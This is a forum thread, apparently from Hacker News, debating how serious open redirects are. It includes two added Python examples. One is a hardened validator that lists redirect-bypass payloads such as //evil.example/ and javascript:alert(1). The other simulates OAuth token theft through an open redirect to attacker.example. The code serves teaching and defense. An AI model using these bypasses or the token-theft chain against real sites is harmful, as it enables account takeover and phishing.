I don't know, I think this case is pretty flimsy. In practice, the value of an open redirect against modern applications is for "phishing". But speaking as someone who has dealt with several ATO dramas over the past two years: users will click on anything. They're not hovering over links to make sure they're safe.

Open redirects are worth fixing, but they're a lot more common than I think people expect they are. I think the severity:low the "good" (unconstrained, straightforward links, persistent, across all browsers) ones get is well measured.

I see open redirects as sort of the archetype of the "t-shirt vulnerability" --- the one the bug bounty sends you swag, instead of cash, for finding.
A decade ago people were using Google redirects to lure people into visiting shock sites.

Back then, it seemed reasonable to not consider this a real security flaw. Now that everyone has a Google account, the possibility of credential theft seems like something worth taking seriously.

At the very least, either host the redirect on a domain that is clearly distinct from the domain users log into, or ignore the destination parameter if the referrer is not a trusted source.

Now I'm wondering if this is also a potential vector for DDoS attacks against a third party. Widely distribute links "to a cute puppy on Instagram" that redirect to a URL that triggers a resource-intensive search operation on the victim's server? (Bonus points if the redirect points to a page that loads an actual cute puppy in one frame, and targets the victim with a 1-pixel frame.)

It sounds like a stretch, but I can't rule the possibility out. Even if it can't be used to launch a DDoS, I could see it being used for advertising fraud.
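An added example, not taken from the comment above or from any site discussed in the thread: a Python validator for a hypothetical `/redirect?url=` endpoint, shown beside the naive version that produces the open redirect. The origin `https://app.example`, the allowlisted hosts and every sample input are constructed for illustration. The validator decides on the parsed and resolved destination rather than on the raw string, which is where the usual bypasses (`//evil`, `/\evil`, `https:evil`, userinfo tricks, lookalike subdomains) live, and it does not depend on the Referer header, which clients frequently strip.

```python
"""Hardened redirect-target validation (added example, hypothetical endpoint)."""
from urllib.parse import urlsplit, urljoin

# Hypothetical deployment values; not taken from any real site.
SITE_ORIGIN = "https://app.example"
ALLOWED_EXTERNAL_HOSTS = {"docs.example", "status.example"}
DEFAULT_TARGET = "/"
OWN_HOST = urlsplit(SITE_ORIGIN).hostname


def naive_redirect_target(url: str) -> str:
    """The pattern that creates an open redirect: put the parameter in Location."""
    return url or DEFAULT_TARGET


def safe_redirect_target(url: str) -> str:
    """Return a Location value that can only land on an allowed origin.

    Steps: reject control characters, normalise backslashes (browsers treat
    them as slashes in the authority of http(s) URLs, urllib does not), resolve
    against our own origin so plain paths keep working, then decide purely on
    the scheme, userinfo and host of the *resolved* URL.
    """
    if not url or any(c in url for c in "\r\n\t\x00"):
        return DEFAULT_TARGET                      # empty or header-splitting input
    resolved = urljoin(SITE_ORIGIN + "/", url.replace("\\", "/"))
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return DEFAULT_TARGET                      # javascript:, data:, ...
    if parts.username is not None or parts.password is not None:
        return DEFAULT_TARGET                      # https://app.example@evil/
    try:
        port = parts.port                          # raises ValueError on junk ports
    except ValueError:
        return DEFAULT_TARGET
    host = (parts.hostname or "").lower()
    if host == OWN_HOST:
        # Emit a site-relative path so no host component reaches Location at all.
        return (parts.path or "/") + ("?" + parts.query if parts.query else "")
    if host in ALLOWED_EXTERNAL_HOSTS and parts.scheme == "https" and port in (None, 443):
        return resolved
    return DEFAULT_TARGET


def demo() -> dict:
    """Constructed inputs a tester would try, mapped to what each version emits."""
    samples = [
        "/account?tab=security",                   # legitimate same-site path
        "//evil.example/",                         # protocol-relative
        "/\\evil.example/",                        # backslash variant
        "https:evil.example",                      # scheme without //
        "https://app.example@evil.example/",       # userinfo trick
        "https://app.example.evil.example/",       # lookalike subdomain
        "https://docs.example/guide",              # allowlisted partner host
        "javascript:alert(1)",                     # non-http scheme
    ]
    return {s: (naive_redirect_target(s), safe_redirect_target(s)) for s in samples}


if __name__ == "__main__":
    for src, (naive, safe) in demo().items():
        print(f"{src!r:45} naive -> {naive!r:45} safe -> {safe!r}")
```

Everything that is not provably our own host or an allowlisted `https` host collapses to `/`, so the worst outcome of a malformed parameter is a redirect to the home page rather than off-site.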
The problem is that often Open Redirects can be leveraged in unexpected ways, beyond the conventional attacks listed.

I have previously been awarded a bug bounty by Google for an issue that leveraged open redirects on victim sites to hijack their link equity (PageRank): http://www.tomanthony.co.uk/blog/google-login-hijack/

It would have allowed a non-trivial financial impact on victim companies.

Secondly, I submitted an issue to Google which leveraged open redirects on their properties to hijack the login flow (i.e. a user is on an official Google page, selects a user and is redirected to an attacker for the password prompt - halfway through the login flow, when a user has likely already established they are on a real site): http://www.tomanthony.co.uk/blog/google-login-hijack/

Sometimes open redirects are unavoidable, but all too often they aren't necessary and so it is simply lazy to not fix them and point to Google and others who mark them as WONTFIX as reason not to bother doing so yourself.
Surprised the author doesn't mention OAuth - open redirects are the Achilles' heel of OAuth flows and allow for full account takeovers. It is very common.
They're also really useful for evading spam filters. I found[1] a bunch of government domains with open redirects.

Spammers were sending out emails containing links to `example.gov.uk/redirect?url=dodgy-viagra.ph` - and certain spam filters were trained to whitelist "trusted" domains.

You also see a lot of open redirect abuse on forums - especially where they're configured to only show the first few dozen characters of a link.

[1] https://www.openbugbounty.org/researchers/edent/
Open redirect alone doesn't look dangerous. But combining it with other vulnerabilities like OAuth misconfiguration -> account takeover. I wrote a blog post about this common mistake some time ago:
https://pwn.netlify.com/open-redirect-to-oauth-token-theft.html
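An added example illustrating the chain the two OAuth comments above describe; it is not code from either commenter's post. It simulates, in Python, an authorization server issuing an implicit-flow token, a client whose `/redirect?url=` route is an open redirect, and a user agent that follows 302s. The misconfiguration modelled is a server that accepts any `redirect_uri` on the client's registered host ("prefix" policy) instead of an exact match; hosts, paths and the token value are all hypothetical.

```python
"""Open redirect + loose redirect_uri check = token theft (added example)."""
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

REGISTERED_REDIRECT_URI = "https://client.example/cb"   # hypothetical registration
CLIENT_HOST = "client.example"
ATTACKER_HOST = "attacker.example"
ISSUED_TOKEN = "demo-access-token"                      # constructed, not real


def redirect_uri_allowed(requested: str, policy: str) -> bool:
    """Authorization-server check of the redirect_uri parameter.

    'prefix': the misconfiguration, any URL on the registered scheme+host passes.
    'exact':  string equality with the registered value (RFC 6749 s3.1.2.2).
    """
    if policy == "exact":
        return requested == REGISTERED_REDIRECT_URI
    if policy == "prefix":
        return urlsplit(requested)[:2] == urlsplit(REGISTERED_REDIRECT_URI)[:2]
    raise ValueError(f"unknown policy {policy!r}")


def authorize(redirect_uri: str, policy: str) -> Optional[str]:
    """Simulated /authorize with response_type=token after the user consents.
    Returns the Location header, or None if the redirect_uri is rejected."""
    if not redirect_uri_allowed(redirect_uri, policy):
        return None
    frag = urlencode({"access_token": ISSUED_TOKEN, "token_type": "bearer"})
    return urlunsplit(urlsplit(redirect_uri)._replace(fragment=frag))


def client_handle(url: str) -> Optional[str]:
    """The client's routes. /cb renders a page whose script reads the fragment
    (final response, returns None). /redirect is the open redirect: it 302s to
    whatever ?url= says and returns that Location."""
    parts = urlsplit(url)
    if parts.hostname != CLIENT_HOST:
        return None                                 # not ours; some other server
    if parts.path == "/redirect":
        return parse_qs(parts.query).get("url", [None])[0]
    return None


def user_agent(start: str) -> str:
    """Follow redirects like a browser: when a Location has no fragment of its
    own, the fragment of the current URL is carried over (RFC 7231 s7.1.2).
    That carry-over is what moves the token off the client's origin."""
    current = start
    while True:
        nxt = client_handle(current)
        if nxt is None:
            return current
        cur_frag = urlsplit(current).fragment
        nxt_parts = urlsplit(nxt)
        if cur_frag and not nxt_parts.fragment:
            nxt = urlunsplit(nxt_parts._replace(fragment=cur_frag))
        current = nxt


def run(policy: str) -> dict:
    """Attacker-crafted authorization request under the given server policy."""
    attacker_uri = f"https://{CLIENT_HOST}/redirect?url=https://{ATTACKER_HOST}/steal"
    location = authorize(attacker_uri, policy)
    if location is None:
        return {"accepted": False, "final": None, "token_leaked": False}
    final = user_agent(location)
    fparts = urlsplit(final)
    leaked = fparts.hostname == ATTACKER_HOST and ISSUED_TOKEN in fparts.fragment
    return {"accepted": True, "final": final, "token_leaked": leaked}


if __name__ == "__main__":
    for policy in ("prefix", "exact"):
        print(policy, run(policy))
```

With the "prefix" policy the token ends up in the fragment of a URL on `attacker.example`; with exact matching the authorization request never completes. Exact matching does nothing about the open redirect itself, so both fixes belong together, but it is the one the authorization server owns.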
If you ever get a third party penetration test, this is like, the first thing they find. To say "no one but attackers cares about" is pretty nonchalant – we immediately patched up this clearly bad attack vector, despite it not being extremely likely to manifest as a serious problem to us, because, like, you should just do that.
Open redirects are also used for SEO spam to hijack domain authority and other nefarious purposes.

It's silly that these big tech companies won't fix them.
I once reported an open redirect attack to GitHub, and they were like, nah, WONTFIX. I believe the issue still exists.

That said, how useful is an open redirect attack really?